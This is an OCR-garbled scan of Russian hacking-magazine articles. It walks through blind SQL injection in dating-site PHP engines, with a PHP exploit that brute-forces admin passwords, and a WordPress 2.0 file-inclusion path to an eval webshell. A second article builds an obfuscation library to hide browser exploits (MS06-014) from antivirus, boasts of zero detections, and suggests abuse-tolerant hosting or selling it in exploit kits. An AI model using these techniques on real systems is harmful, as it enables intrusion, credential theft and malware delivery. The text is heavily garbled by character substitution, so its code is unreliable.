Ѵ/агпіпд: тузд1_:Е:екс]т_аггау ( ) : зиррііесі агдишепР із поС 
а ѵаіій МуЗОБ гезиІБ гезоигсе іп 2 : \Ьоте\1атег\ѵлллѵ\ 
сіаБеЗ \зеагсЫ_гезиІБ . рЫр оп Ііпе 43 5 
ЗЕБЕСТ Ргоіііез . ІБ, Неасіііпе, СоипБгу, ОссираБіоп, 
СіБу, Зех, Зех2 , РгоііІеТуре , ЫіскЫаше, СЫіІсІгеп, 
МегсЫапБРгісе , ЬЕЕТ ( БезсгірБіопМе , 180 ) АЗ 
БезсгірБіопМе, ЬЕЕТ ( БезсгірБіопУои , 100 ) АЗ 
БезсгірБіопУои , БаБеОБВігБЫ , БаБеОБВігБЪ.2 , Ріс_0_ 
аскіоп , ЗошкЗ, (ЕавББаѵТіте > ЗБВБАТЕ (ЖЖ ( } , ШТЕКѴАБ 

5 МІШТЕ) ) аз із опі ЕКОМ РгоБіІез ѴШЕКЕ ЗБаБиз = 

1 АсБіѵе’ АББ БіскБате - ' ' ' ОКБЕК ВУ РгіогіБу БЕЗС, 
РгіогіБу БЕЗС, РгоБіІез . БазББоддесІІп БЕЗС БІМІТ 0, 10 

Подсчитав количество полей (их оказалось 18), я ввел следующее значе- 
ние в«Поискпо нику»: 

' ипіоп зеіесС 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 
,17,18/* 

Но скриптобломал меня, нигде не показав результат моего запроса. 
Копать глубже было лень, и я пошел по другим разделам датинга. 
Оговорюсь сразу, что бесполезных инъекций, подобных предыдущей, 



было великое множество (например, Ыір ://1оса Нлозі/сіаіе/ргоіііе есііі. 
рЬр?ІР=1 для тренировки ты можешь поискать их сам), но практиче- 
ской пользы они принести опятьже не могли. После получаса поисков 
мое внимание привлек нехитрый скрипт для оценки фотографий 
пользователей: Ыір ://1оса ІЬозі/сІаІе/гаІе . рИ р . При заходе на него взору 
открывается рандомная фотка из рандомного профиля юзера (тебе 
надо зарегать нового пользователя и залить для него фотку, чтобы 
следовать за мной дальше). Открыв исходный текст страницы, я увидел 
там ЫсИеп- пара метры Ю и ріс_питбег и немного подкорректировал 
Ыті-код уже сохраненной на винт странички: <1о ггтт те1:НосІ=ро5І 
пате=РогтѴо1:е> поменял на «Іогт теШосІ=ро5і пате=РогтѴо1:е 
асііоп=''Шр://ІосаІЬо5і/сІаіе/гаіе.рЬр”», затем «іприиуре=” ЫсИеп» 
пате=”Ю» ѵаІие=2» на <іп риі пате=”Ю»ѵаІие=2» и «іприиуре=”ЬісІбеп" 
пате=”ріс_питЬег" ѵаІие=1» на «іп риі пате=”ріс_питЬег" ѵа1ие=1». 
Затем я подставил во вновьобразовавшиеся два поля кавычку и увидел 
вывод скрипта: 

ЗЕБЕСТ АѴС(Магк) ЕКОМ ѴокезРЫокоз ШЕКЕ МешЬег=2 АББ 

Ріс— 1 ' 

Значит, в нашем случае не фильтровалось поле с ріс_питбег. Его-то мы и 
будем дальше использовать для нашей ЫіпсІ 50І_-іпіес1:іоп =). 

Итак, смотрим, что будет, если подставить в наше поле синтаксиче- 
ски верный запрос. Например, «1 АЫО 1=1/*». Скрипт выплюнет нам 
страничку, которая и должна быть при правильном ее использовании =). 
Атеперь подставляем в уязвимое поле «1 АШ 1=2/*» и видим: «Всего 
голосов: 0» и «Средний рейтинг: 0.0». При правильном запросе — «Всего 
голосов: 1 ». Теперь на основе полученной информации можно написать 
несложный эксплойт на том же самом РНР. 

АВТОМАТИЗАЦИЯ ПРОЦЕССА 

Я не буду сильно углубляться в кодинг, моя задача — написать демон- 
страционный эксплойт, чтобы показать возможности найденного бага. 
Для начала нам необходимо узнать, в какой таблице хранятся логины 
и пароли админов датинга, для чего идем по адресу Ыір ://1оса Ппозі/ 
рЬртѵасІтіп и смотрим базу нашего скрипта (у меня это баіе). Таблица 
с админами обнаруживается сразу — это Абтіпз. Теперь необходимо 
продумать структуру сплоита. Для простоты я буду писать его для МуЗСЫ 
версии 4.1 (и выше), поддерживающего подзапросы. 

Итак, наш ядовитый запрос, вставляемый вто самоеуязвимое поле, 
будет выглядеть следующим образом: 

1 апсі сЫаг ( $сЫаг ) = (зеіеск зиЬзігіпд (Раззтлгогсі, 1 , 1 ) 

ігош Асітіпз 1ІШІС 1)/* 

Здесь$сИаг — это А5 С 1 1 - код первого перебираемого символа из поля с 
паролем админа, то есть если этотсимвол равен перебираемому, тогда 
скриптвыполнится верно (аналог«1 АШ 1 = 1/*» из моего примера) и 
покажет, что всего голосов 1 , в противном случае — что голосов 0 =). 
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> іп^о 

Когда будешь искать 
баги, первым делом 
проверь ЫсИеп-поля 
в различных Ніті- 
формах. Наиболее 
вероятно, что имен- 
но втаком поле не 
будет фильтроваться 
пользовательский 
ввод. 

Ты не можешь ис- 
пользовать платные 
движки на своем 
веб-сайте. После 
ознакомления с 
движком, ты обязан 
удалить его со своего 
компьютера. 



/«ѵ 







> ѵѵагпіпд 

Следует отдавать 
себе отчет в том, 
что эта статья была 
написана исключи- 
тельно в исследова- 
тельских целях и лю- 
быетвои действия, 
нарушающие законы 
страны, в которой ты 
проживаешь, 
могут привести 
куголовной 
ответственности. 



Думаю, что тут все понятно, и можно приступать к написанию 
сплоита. Сразу оговорюсь, что мускулу все равно, большими 
мы буквами оперируем или маленькими, поэтому возьмем 
диапазон только из маленьких букв. 

Вот код моего небольшого сплоита с комментариями: 

<? 

//адрес уязвимого скрипта 
$зібе= ' Іосаійозб ' ; 

$раД]т= ' /бабе/габе . ркр ' ; 

//перебираемый в данный момент символ пароля 
$ псж_зутЪо 1 = 1; 

//массив с АЗСІІ-кодами символов а- 2 , 0-9 
$агг=аггау (48,49,50,51,52,53,54,55,56,57,97 
,98,99,100,101,102,103,104,105,106,107,108, 
109,110,111,112,113,114,115,116,117,118,119 
, 120 , 121 , 122 ) ; 
бипсбіоп скеск ( $скаг ) 

{ 

дІоЬаІ $зібе , $рабк, $псж_зутЪо1 ; 

$бр = бзоскореп ( $зібе , 80, $еггпо, 
$еггзбг , 3 0); 

//строка с РОЗТ-параметрами, включая 
бажный ріс_пишЬег 

$баба= " ІБ=242815&ріс_пишЬег=1 апб 
скаг ( $скаг) = (зеіесб зиЪзбгіпд (Раззчлюгб, $псж_ 
зутЬоІД) бгот Абтіпз Іітіб 1) /*&ѵобе=1" ; 

$оиб = "РОЗТ $рабк НТТР/1 . 1\г\п" ; 

$оиб .= "Нозб: $зібе\г\п" ; 

$оиб .= " Сопбепб-буре : арріісабіоп/х- 
ѵлллѵ-1огш-иг1епсобес1\г\п" ; 

$оиб .= "Соппесбіоп: С1озе\г\п" ; 

$оиб .= "Бзег-Адепб : Орега\г\п" ; 

//сюда обязательно вставляем куки на- 
шего зареганного пользователя 

$оиб .= " Соокіе: тетЪегІБ=251251 ;тетЪ 
егРаззѵ^огб=зер2г7УНхѵдхСѵ^; \г\п" ; 

$оиб .= "Сопбепб-Ьепдбк: 

" . збгіеп ( $баба) . " \г\п\г\п" ; 

бѵпгібе ( $бр , $оиб . $баба) ; 
вдМІе (!беоб($бр)) 

{ 

$кизок.= бгеаб($бр, 4800); 

} 

бсіозе ( $бр) ; 
гебигп $кизок; 

} 

$1 = 0 ; 

//проверка на средний рейтинг, равный 
0.0, пока запрос неверен 

ѵбкііе (егед ( * (0\ . 0) ' , скеск ( $агг [ $і] ) ) ) 
{ 

11изк() ; 



ргіпб скг ($агг [$і] ) . ' -поб<Ъг/>' ; 

$і + +; 

} 

ргіпб скг ($агг [$і] ) . ' -уез<Ъг/>' ; 

?> 

Запустив этот сплоиту себя на компьютере и изменяя 
значение $по\л/_5утЬоІ, ты через несколько минут соберешь 
весь парольадмина =). Конечно, можно доделать этот код, 
чтобы не вписывать новое значение искомого символа после 
каждой найденной буквы пароля, но рамки статьи этого не 
позволяют — потрудись это сделать самостоятельно. Даль- 
ше, уже из админки, ты можешь спокойно получить шелл на 
сервере, просто залив РНР-файл в качестве баннера или 
фотографии =). 

НОВАЯ КРОВЬ 

Как ты уже понял, на од ном датинге мы не собираемся 
останавливаться =). Следующая наша жертва — небезыз- 
вестный движок для блогов ѴѴогбРгевв версии 2.0. Именно 
внемянашел способ заливки шелла из админки, даже 
когда нет прав, чтобы редактировать шаблоны и плагины. 
Наша задача — любыми методами попасть в эту админку. 
Для этого можно воспользоваться любым из сплоитов, 
предоставленных на Ьі1р://тіІѵѵ0гт.сот . Описание их 
работы не является моей задачей =). Итак, поставив дви- 
жок на свой комп, и создав нового админа, мы логинимся 
и оказываемся в огромной админке. Теперь нужно искать 
баги. Для этого подставляем кавычки во всевозможные 
параметры, вписываем что-то типа «/еіс/раввѵѵсі» во 
всевозможные окошки, но нигде нам не подворачивает- 
ся ничего стоящего. Атеперь посмотри внимательно на 
исходник страницы с плагинами рІидіпв.рЬр. Видишь в 
самом верху? 

іб ('асбіѵабе' == $_СЕТ [ ' асбіоп ' ] ) { 

$сиггепб = деб_зеббіпдз ( 

' асбіѵе_р1идіпз ' ) ; 

іб ( ! іп_аггау ( $_СЕТ [ 'ріидіп' ] , $сиггепб) ) { 
$сиггепб[] =бгіт( $_СЕТ [ 'ріидіп' ] ) ; 
зогб ( $сиггепб ) ; 

ирбабе_орбіоп ( ' асбіѵе_р1идіпз ' , 

$сиггепб) ; 

іпсіибе (АВ8РАТН . 'Х'^р-сопбепб/ріидіпз/ ' 

бгіт ( $_СЕТ [ 'ріидіп' ] )); 
бо_асбіоп ( ' асбіѵабе_' . бгіт( $_ 

СЕТ [ 'ріидіп' ] )); 

} 

Это значит, что, если активируется какой-либо новый пла- 
гин, он сразу инклудится прямо в движок без какой-либо 
проверки пути или содержимого! Теперь остается только 
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залить куда-нибудь шелл, с помощью которого мы будем измываться 
над жертвой. Благо ѴѴогбРгевз предоставляеттакую возможность =). 
Заходим в «Орііопв -> Мізсеііапеоиз», ставим галочку АІІоѵѵ Рііе Ііріоасіз 
и вводим следующий путь для загрузки файлов вместо существующего: 

Ат р. После всех вышеописанных 

действий самое время заливать шелл =). Для этого подготовим файлик 
(например, 1 Д рд) со следующим содержимым: 

<?ркр 

ік (іззек ( $_СЕТ [аа] ) ) 

{ 

еѵаі (кгіт(зкгірз1азкез ($_СЕТ [аа] > ) ) ; 

} 

?> 

Заливаем этот файл посредством НТМБ-формы, которая находится на 
страничке создания новой блоговой записи. Все. Теперь со спокойной 
душой открываем Ы:1:р ://1оса ІЬ озіі/ѵѵогсі рге55/ѵѵр-асІтіп/рІидіп5.рЬр?ас1:і 
оп=асІіѵаІе&р[идіп=/../../../../../../../../../../../../../../../../../../../1 -ірд . 

Шелл успешно заинклудится в наш скрипт, и мы сможем его использовать 
следующим образом: 

кккр: //1оса1козк/ѵ\гогс1ргезз/аа=зузкет( ' ісі' ) ; 

А вообще для инклуда в чужие скрипты я использую РНР-код собствен- 
ного написания, которыйты можешьнайти на диске, прилагаемом к 
журналу. 

Дальше, думаю, ты разберешься =). Сейчас же на моем операционном 
столе находится новый пациент. 

ДАТИНГИ РУЛЯТ! 

И вотснова под микроскопом очередной скриптпопулярногодатинга (что-то 
они мне полюбились=)). На этот раз — йакпд ЗоИѵѵаге, довольно удачный 
конкурент предыдущего бажного движка. Здесь я действовал также, как 
и при предыдущем поиске бага. Мельком просмотрел сорцы на РНР-инк- 
луд, повтыкал кавычки в разные параметры, но, на своеудивление, не 
обнаружил таких глупых ошибок, какие я находил ранее. Пришлось более 
основательно копаться в исходниках^. Первым делом я полез в іпбех.рЬр и 
чуть неупал со стула, когда в первыхже строчках кода увидел следующее: 

ік (іззек ($НТТР_СЕТ_ѴАКЗ [ 'гекегісі' ] ) ) { 
$гекегі<і=$НТТР_СЕТ_ѴАКЗ [ 'гекегісі' ] ; 
зексоокіе ( " гекеггег " , " $геРегій" , 0 ) ; 

$диегу= " ЗЕЬЕСТ акк_с1іскккги ЕРОМ аккіііакез ШЕКЕ 
аРР_изегісі=$геРегі(і" ; 

$гези1к=тузд1_диегу ( $диегу , $1іпк) ог сііе (тузд1_ 
еггог ( ) ) ; 

Переменная $гебегіс! совершенно не фильтровалась! Чтобы убедиться в 
этом воочию, я проследовал по адресу Ькр:/Латег/сІаІе/?ге[егісІ= ’ (туда я 
поставил новый датинг) и увидел ошибку, которую ты можешь наблюдать 
на скриншоте=). В данном случаетоже ничего нельзя было получить про- 
сто и нужно было думать над составлением запроса и написанием сплоита 
к найденной инъекции. После бутылки пива я, наконец, составил нужный 
мнезапросдля МуЗОБ версии 4.1 (и выше). Он выглядел следующим 
образом: 




Вот еще один баклан. Взял 
публичный движок и думает, 
что получил отлично работаю- 
щую и защищенную систему. 
Нужно и самому что-то делать. 



Делать мне больше нечего, 
как неделю движок перепи- 
сывать. Все равно ни мой, ни 
твой сайт никто не хакает — 
твой хакать лень, а мой просто 
на фиг никому не нужен. 



/ ?гекегі<5=-99 ипіоп зеіеск 1 Ргогп шешЬегз ъгкеге шет_ 
изегіс!=1457 6 апсі скаг ( $с1таг ) = ( зеіеск зиЪзкгіпд (тет_ 
раззтлгогсі, 1 , 1 ) Ргот шешЬегз ѵРЬеге тет_изегісі=1457 6 ) /* 

Объясняю. 14576 — это Ю администратора (гшападег) по дефолту. Если 
наш запрос выполнится и будет верным (то есть«“апб 1 = 1 "/*», как в 
предыдущем примере), то мы перейдем на следующий запрос в скрипте и 
увидим такую ошибку: 

[Уои Ьаѵе ап еггог іп уоиг ЗОЬ зупЪах; скеск кке тапиаі 
ккак соггезропсіз ко уоиг МуЗОЬ зегѵег ѵегзіоп бог кке 
гідкк зупках ко изе пеаг 'ипіоп зеіеск 1 кгот тетЬегз 
ѵіЬеге теш_изегісі=1457б апсі 1 = 1/*' ак Ііпе 1] 
ирсіаке аккіііакез зек акк_с1іскккги = акк_с1іскккги+1 
ѵ/кеге акк_изегісі=-99 ипіоп зеіеск 1 кгот тетЬегз ѵікеге 
тет_изегісі=1457б апсі 1=1/* 

Скрипт пытается подставить наш корявый $гекегісІ в ІІРОАТЕ-запрос, что, 
естественно, вызываетошибку. Еслиже запрос не найдет совпадений в 
базе (то есть перебираемый символ не будет равен нужному символу в 
пароле админа), то скрипт попросту выдаст нам свою главную страницу, 
даже не заругавшись. Не буду приводить код эксплойта под этот баг, ты 
сможешь найти его на диске кжурналу. Скажулишь, что он работает по 
принципу нахождения ключевого слова зупіах: если оно есть — переби- 
раем дальше, если нет— искомый символ найден. 

ЭПИЛОГ 

Подведем небольшой итог. Были найдены три очень серьезные уязви- 
мости в движках, которых полно в инете; было проанализировано много 
строк РНР-кода и раскрыты некоторые тонкости поиска багов. Теперь, кто 
знает, можетбыть, именноты найдешь новую дыру, приводящую кзаливке 
шелла в последнем рбрВВ :-1. тг 
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За семью 
замками 

Шифруем эксплойты 

ПРОБЛЕМАШИФРОВАНИЯ И ЗАЩИТЫ 
ДАННЫХ ЯВЛЯЕТСЯ ОДНОЙ ИЗ САМЫХ 
АКТУАЛЬНЫХ НА СЕГОДНЯШНИЙ ДЕНЬ. 
СУЩЕСТВЕННЫЙ СКАЧОК В РАЗВИТИИ 
ТЕХНОЛОГИЙ, ВЫЧИСЛИТЕЛЬНЫХ МОЩ- 
НОСТЕЙ ТРЕБУЕТ ПО-НОВОМУ ВЗГЛЯ- 
НУТЬ НА СТАРЫЕ ПРОБЛЕМЫ. БРУТ- 
ФОРС, КОЛЛИЗИИ, ТАБЛИЦЫ РАДУГИ 
СТАЛИ АКТИВНО ИСПОЛЬЗОВАТЬСЯ В 
ПОСЛЕДНЕЕ ВРЕМЯ, ЧТО ДОСТАВЛЯЕТ 
НЕМАЛО ГОЛОВНОЙ БОЛИ ПРОГРАММИ- 






СТАМ, АДМИНИСТРАТОРАМ И ПРОСТО 
ЛЮДЯМ, РАБОТАЮЩИМ В ІТ-СФЕРЕ. 
ИЗ-ЗАУТЕЧКИ ИНФОРМАЦИИ ФИРМА 



Когда и это перестало срабатывать, вспомнили, что есть ^-функция 
ипезсаре, которая возвращает символ по НЕХ-значению его А5С II- кода. 
Вышеописанный скрипт усовершенствовали: 



МОЖЕТ ПОТЕРЯТЬ НЕ ТОЛЬКО ЛЬВИНУЮ 
ДОЛЮ ПРИБЫЛИ, НО И МЕСТО НАРЫНКЕ. 

егодня мы не будем изобретать велосипеды, писать свои 
алгоритмы шифрования, системы обмена ключей. Мы 
используем то, что до насуже сделано усилиями пытливых 
умов. Часто бывает, что требуется скрыть исходникстра- 
нички, зашифровать сплоит, спрятать ссылку на важный файл (чтобы ее 
не обнаружили поисковики). Насколько япомню.данныена страницах 
впервые начали прятать из-за особого разгула спам-ботов, которые 
просто бегали по страничкам и вырезали нужные им данные. Для этого 
умные люди придумали простой и действенный способ; многие, кстати, 
ИМ пользуются ДО СИХ пор: 

сЗсгірЫ Ьапдиаде=" ШаѵаЗсгірЫ"><іоситепй . 
шгіЫе ( "сіібог" + "@" + "шаі1 . ги" ) ; </зсгірЫ> 



сЗсгірЫ Ьапдиаде=" Заѵа8сгірЫ">с1оситепЫ .шг іРе ( "сіібог 
"+ипезсаре ( "%40" ) +"таі1 . ги" ) ;</зсгірЫ> 

Однако спамеры тоже не сидели сложа руки и совершенствовали 
алгоритмы распознаваниятекста, вследствие чего бедным веб-програм- 
мистам пришлось прилично напрягать мозги и вспоминать школьные/ 
университетские курсы криптографии. В результате в бой пошли шифры 
сдвига, замены, блочные. Для сайтов проблемы вроде как кончились, но 
тут начали рыдать и плакать вирмейкеры и просто троянщики, поскольку 
эвристические фильтры в антивирусах настолько поумнели, что все спло- 
иты, внедренные ранее в код страниц, начали палиться. Хакеров стали 
ловить... ужас какой-то, прям Средневековье. 

Помогла тут опять-таки нелюбимая всеми математика, аточнее, наука, 
основанная на ней, с гордым именем «криптография» (наука о математи- 
ческих методах обеспечения конфиденциальности и аутентичности ин- 
формации). Сплоиты стали шифровать, используя кто что может: начиная 
от пресловутого ипезсаре и до специальных библиотектипа ІІЬ.сзоигсе, 
которая, кстати, на текущий момент используется в 90% связок. Однако 
антивирусные компании должны оправдывать себя и вложенные в них 
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деньги покупателей. Фильтры совершенству- 
ются, часть шифрованных сплоитов ловится по 
сигнатурам шифра, часть - эвристиками, часть 
— по содержимому памяти. Одним словом, 
клиенты рады. 

Однако не будем о плохом, будем о хорошем и 
интересном. Какя и говорил выше, сегодня мы 
рассмотрим способы скрытия данных втвоих 
персональных или не очень страничках. Пер- 
вый более-менее действенный способ — это 
ипезсаре. Взглянем на листинг: 



<? 

$зСг= "сІіТогѲтаіІ . ги" ; 

Тог ( $і=0 ; $і<зТг1еп ( $зТг ) ; $і++ ) { 

@$зТг2 . = 

Йесііех (огсі ( $зТг [ $і] ) ) ; 

} 

есТю "<зсгірТ>с1оситепТ .шгіТе (ипезсаре ( ' " . $зТг2 . " ' ) ) 
</зсгірТ>" ; 

?> 

Если посмотреть на получившийся код страницы, мы увидим следующее: 

<зсгірТ>с1оситепТ .мт іТе (ипезсаре ( '%64%69%66%6Т%72%40 
%6сі%61%69%6с%2е%72%75 ' ) )</зсгірТ> 

Не всякий додумается, что это. Кстати, подобным способом неплохо 
скрываются ссылки кфайлам, еслиты нехочешь, чтобы благодаря 
поисковикамтвои файлы стали достоянием Сети. Способ примитивный, 
но действенный. 

Следующий алгоритм, который мы разберем, — это шифрование методом 
сдвига, а конкретно, шифр Цезаря, где сдвиг идет на три знака вправо. 

<8сгірТ Ьапдиаде=" Цаѵа8сгірТ"> 

ТипсТіоп сезаг (сІаТа) { 
ѵаг зТг=петлг Аггау ( ) ; 
бог (ѵаг і=0; іссІаГа . ІепдЫі; і + +) { 
зТг [ і] =8Тгіпд . ТготСЬагСосІе (сіаТа . сЬагСосіеАТ ( і ) -3 ) ; 

} 

геСигп зТг . д оіп ( ' ' ) ; 

} 



разования». История создания этого шифра до сих пор покрыта мраком. 
Известно лишь, что алгоритм перешел в разряд «полностью открытых» 
в мае 1994 года, до этого на нем стояло клеймо «только для служебного 
использования». Кстати, сегодня его использует Центральный банк 
Российской Федерации и им же шифруются данные, составляющие 
государственную тай ну. Стоит задуматься :]. Однако для нашей задачи он 
не подходит, так как использование его не бесплатно. 

Вернемся к нашемузверю. Мыхотим, во-первых, написатьсвой шиф- 
ратор, во-вторых, чтобы код каждый раз выходил новый (то есть смена 
общей сигнатуры), в-третьих, чтобы система состояла из серверной части 
на РНР, которая будет шифровать данные, и клиентской части, которая 
будет их расшифровывать непосредственно в браузере пользователя. 
Итак, разомни руки, растяни сухожилия на пальцах — начинаем работать. 
Основной алгоритм шифрования я решил взять все-таки РС4, поскольку 
он довольно прости нетребует серьезных вычислительных мощностей 
какнауровне шифрования, так и на уровне дешифрования. Ключ шиф- 
рования и сам шифрованныйтекст будем переводить в Ьазе64, чтобы 
исключить проблемы с битьем кодировки зашифрованного текста. Функ- 
циям, отвечающим за дешифрование, будем присваивать каждый раз 
новые имена, что поможет нам немного сбить общую сигнатуру конечного 
шифра. И, наконец, последним уровнем будетперевод в НЕХ-значения 
и вывод в браузер. Чтобы облегчить использование этого зверя, мы сде- 
лаем его в виде библиотеки, которая будет перехватывать генерируемый 
РНР-интерпретатором конечный код и шифровать его. Для подключения 
библиотеки просто инклудни ее в файл, генерируемый контент которого 
ты хочешь скрыть. 



сіоситепТ .шгііе (сезаг ( "дІігиСрсІІоІих" ) ) ; 

</зсгірТ> 

Фраза «дІігиСрсІІоІ их» — не что иное, какбіЬгйппаіІ.ги. Сам шифр можно 
генерировать изначально, вбивая руками в НТМІ_- конте нт, а можно по- 
весить эту задачу на РНР-скрипт. Создание шифра получается методом 
сЬг(огсі($бФ)+п), где п —требуемый интервал сдвига. Вскрыть подобное 
зверье будетуже сложнее. Кроме того, если замусорить код, то инфа 
скроется нетолько от глаз нехороших личеров, но от разного рода ботов 
и «антивирей» :]. Однако не стоитсмотреть в сторону Запада, поддер- 
жим российского производителя. Не будем забывать отечественную 
математическую школу, признанную во всем мире. Перед тобой шифр, 
официально именуемый «ГОСТ 28147—89 Системы обработки информа- 
ции. Защита криптографическая. Алгоритм криптографического преоб- 



3, 2, 1, ПОЕХАЛИ! 

Для начала определимся с реализацией алгоритмов ПС4 и Ьаве64. Доб- 
рый человекАІІ ЕагбасІІ [ІагЬасІі.іг] реализовал ПС4какна 95, таки на РНР, 
также его рукдело — написание функции, отвечающей за Ьазе64-декоди- 
рование на 9аѵа-скрипте, за что ему выражено спасибо в виде респекта на 
мыло. Далее, приведу несколько небольших функций, которые понадобят- 
ся для реализации задуманного и могутбыть полезны втвоих проектах. 
Функция, переводящая осмысленный код в вид «%64%69%66%6Т%72%40 
%6сі%61 %69%6с%2е%72%75», упоминалась выше. 

ТипсСіоп деп_гпс! ($1еп, $Суре="<іеТаиІС" ) { 

$гпсМ:ехС=пи11 ; 

Тог ( $і = 0 ; $і<$1еп; $і + + ) { 
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Боевой код, шифрованный нашей библиотекой 

$Ъетр=гапс1 (1,3) ; 

іі ($і = = 0 апсі $Ъуре=="ѵаг" ) { 

$0етр2=гапс1 ( 1 , 2 ) ; 
іі ($0етр2==1) { 

$гпсМ:ех1: . =сЬг (гапсі (65,90) ) ; 

} еізе { 

$гпсМсехЦ . =сЬг (гапсі (97,122) ) ; 

} 

} еізе { 

іі ($0етр==1) { 

$гпс1_1:ехЪ . =сЪ.г (гапсі (65 , 90) ) ; 

} еізеіі ($0етр==2) { 

$гпс1_ЪехЪ . =сЪх (гапсі (97 , 122 ) ) ; 

} еізе { 

$гпсМ:ехД . =сЪг (гапсі (48,57) ) ; 

} 

} 

} 

геЪигп $гпсі_1:ехЪ; 

} 

Функция для генерации разнообразных рандомных имен переменных, 
функций, констант по правилам программирования всегда начинается со 
строкового символа. Далее объявим флаги переменную, отвечающую за 
вывод сообщения при отключенном 15. 

$еггог_тзд_з1тотлг='Ьгие ; 
іб ( $еггог_тзд_зЬ.ом) 1 

$еггог_тзд= ' <теба Ъ.1сЪр-едиіѵ= "СопДепД- 
Туре" сопбепЦ="Оех1с/Ысш1; с]тагзеЦ=ѵтіпс1сжз- 
1251"><позсгірб>Включи поддержку ЦЗ в твоем браузере 
для корректной работы</позсгірб><Ьг> ' ; 

} еізе { 

$еггог_шзд=пи11 ; 

} 

ТЕСТИРУЕМ ШИФРАЦИЮ 

Теперь настала пора протестировать боевой функционал системы. Возьмем какой- 
нибудьжугко спаленный сплоит и попробуем сделатьтак, чтобы его по возможности 
неувидел ни один антивирус. Первый взгляд мой пал насплоитМйАС(М506-014). 
Для пополнения знаний об эксплойтах советую почащезаглядывать на 
тіІѵѵОгт.сопп и раскеівіогтвесигііѵ.огд . Данные. находящиеся там, при 
правильном их использовании поистине бесценны. 

Итак, сплоит для тестирования выбран, код скачан, файл с ним создан. 
Скармливаем его Вирустоталу и смотрим результаты. Результаты неуте- 
шительны, и этого следовало ожидать. Еще бы — не распознать сплоит 
в плайн-тексте! Основные антивирусы его увидели, да еще какувидели. 
Что же, будем работать над сокрытием. Рандомные имена функций, ключа 
шифрования сделали свое дело. Разница видна уже в процессе сканиро- 
вания. Первыеантивирусы неувидели в коде ничего подозрительного. 
Замечательно, ждем окончания. 



Повторюсь, скрывали мы только вызов сплоита. Область памяти можно 
скрытьза счет серьезной обфускации самого тела сплоита. Дать перемен- 
ным случайные имена, порезать строки на случайные длины, перемешать 
все это дело. После подобного издевательства над кодом можно смело раз- 
мещать библиотеку шифрования-обфускации и сам кодсплоита на абузных 
серверах. Не забудь прикрутить кэширование, поскольку генерация 
подобного кода кушает немало ресурсов системы. Аесли на страничку бу- 
деттечь приличный объем трафика, не один хостер не согласится держать 
подобное. Делай обновление сигнатуры хотя бы раз в 1 0 минут. Итак, ска- 
нирование нашего шифрованного кода завершено, смотрим результаты и 
радуемся им. Не один из антивирусных пакетов Вирустотала не обнаружил 
в безобидном Іаѵа-коде боевого сплоита. Это не может не радовать. 

Что с этим делать — решать тебе. Твое право — выбирать: направить все это 
в мирное русло и организовать сервис по шифрованию сплоитов, кода, ит.д. 
или вставить библиотеку в свою мегасвязку и продавать ее за баснословные 
деньги. Однако я несоветуютебе нарушать закон. Но если вдругты ему не 
последуешь, не забывай старинную русскую поговорку, полную мудрости и 
глубокого смысла: «Скупой платитдважды». В переводе на современный 
русский языкэто значит: «Не забывай про за щиту не только своих чудо-зве- 
рей, но и себя любимого». Носки и ѴРИ еще никто не отменял. 

ПОЖИНАЕМ ПЛОДЫ 

Итак, что мы в итоге получили? А получили мы средство для шифрова- 
ния генерируемого НТМБ-кода страницы, с помощью которого можно 
спрятать нетолько ссылки на файлы или картинки, но и вышеуказанные 
сплоиты. Но не стоит шифровать подобным образом все и вся, посколь- 
ку это очень сильно сказывается на скорости дешифровки контента на 
стороне конечного пользователя, — пару ссылок, емейл-адреса, тэги с 
картинками. Для задания вывода какого-нибудь еггог-сообщения при 
отключенных скриптах в функцию можно добавить переменную типа 
$1уре, в которой будет содержаться тип шифруемого контента. Вместо ис- 
ходной картинки будет отображаться другая, с надписьютипа: «Ыо ітаде, 
асііѵаіе 15». Вместо ссылки — тексттипа: «Ыо игі, асбѵаіе15». В общем, 
куча способов заставить пользователя включитьтребуемыеіаѵа-скрип- 
ты. Пример системы, описанной в статье, требует еще долгой, возможно, 
для кого-то нудной доработки. Однако, посидев вечерок-другой над 
скриптами, ты сможешь получить действительно многофункциональ- 
ный инструмент для шифрования данных. С помощью РНР-реализаций 
криптоалгоритмов можно сделать дешифрование информации из базы 
данных, либо, наоборот, шифрование заносимых в нее данных. Возмож- 
ности, которые открываются, по истине безграничны, все зависит л ишь от 
твоей усидчивости и желания. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

В своих проектах я часто реализую следующую связку. Пароли шифруются 
моималгоритмомусиления МБ5 (][, №103); вся информация, касаемая 
личных данных пользователей, шифруется РС4; файл конфига, содержащий 
ключи для расшифровки, закрытлибо моим обфускатором, либо последним 
зендом. Доступ кадмин-панели осуществляется только по ІР-адресу, либо 
стоитпроверка на перебор. Происходитанализ: простоли человекломится 
на все возможные комбинации в админ-панель (втаком случае выдается 
блок по ІРи куки), или идет подбор пароля к конкретному администратору. 
После энных неудачных попытокавторизации этотаккаунт блокируется на 
некоторое время, плюс администратору, владельцу этой учетной записи, на 
почтовый ящик высылается сообщение о попытке взлома аккаунта. 

Однако стоит помнить, что безопасность твоих проектов зависит напря- 
мую оттебя самого. Даже самая совершенная система безопасности 
можетбыть бесполезной из-за человеческого фактора, не забывай об 
этом. Удачи! не 
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ЕВГЕНИЙ «СОВѴѴІІЧ» ЕРМАКОВ 

/ ЕПМАКОѴ@САМЕІ_АЫО.ПІІ / 



Разрушая базы 

Внедряем 50Ь в 0В2, ЗуЬазе и Іпдгез 

КАК НИ СТРАННО, НО ПРАКТИЧЕСКИ КАЖДЫЙ МЕСЯЦ В РУНЕТЕ ПОЯВЛЯЮТСЯ ВСЕ 
НОВЫЕ И НОВЫЕ МАНУАЛЫ ПО 3 О Ы- 1 N Ч ЕСТІ О N . И ВСЕ ОНИ, «КАК ПОЛАГАЕТСЯ», ПО- 
СВЯЩЕНЫ ИНЪЕКЦИЯМ В МУ50Е. ЧТОБЫ НАКОНЕЦ-ТАКИ ПОЛОЖИТЬ ЭТОМУ КОНЕЦ, 
БЫЛА НАПИСАНА ПЕРВАЯ ЧАСТЬ СТАТЬИ «РАЗРУШАЯ БАЗЫ», В КОТОРОЙ БЫЛИ 
РАССМОТРЕНЫ ИНЪЕКЦИИ В РОЗТОРЕЗОЬ И ОРАСЬЕ, НУАСЕЙЧАСТЫ ВИДИШЬПЕ- 
РЕД СОБОЙ ЕЕ ПРОДОЛЖЕНИЕ, ИТЕПЕРЬМЫ БУДЕМ ВНЕДРЯТЬ 50Ь В ЕЩЕ БОЛ ЕЕ 
